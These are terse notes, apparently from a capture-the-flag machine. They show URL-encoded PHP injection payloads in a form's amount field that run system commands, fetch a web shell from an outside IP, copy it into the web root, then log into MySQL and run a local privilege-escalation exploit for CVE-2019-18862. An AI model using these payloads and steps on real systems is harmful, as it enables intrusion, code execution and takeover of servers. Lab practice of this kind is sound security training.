`1')+!%3d%3d+false+and+system('ls')+and+is_numeric('a`from=fasdf&fromaddr=fadsf&to=fdasf&toaddr=fasdf&amount=1')+!%3d%3d+false+and+system('wget+http://10.10.15.211/shell.php')+and+is_numeric('a`&comments=fasdfasd
from=fasdf&fromaddr=fadsf&to=fdasf&toaddr=fasdf&amount=1')+!%3d%3d+false+and+system('cp+shell.php+/var/www/html/shell.php')+and+is_numeric('a`&comments=fasdfasd
mysql -u root -D transactionsDB -p
In the flag database one flag after the shell.
The used the linpeas to find the exploit maildg
https://github.com/bcoles/local-exploits/blob/master/CVE-2019-18862/exploit.ldpreload.sh
./exploit.ldpreload.sh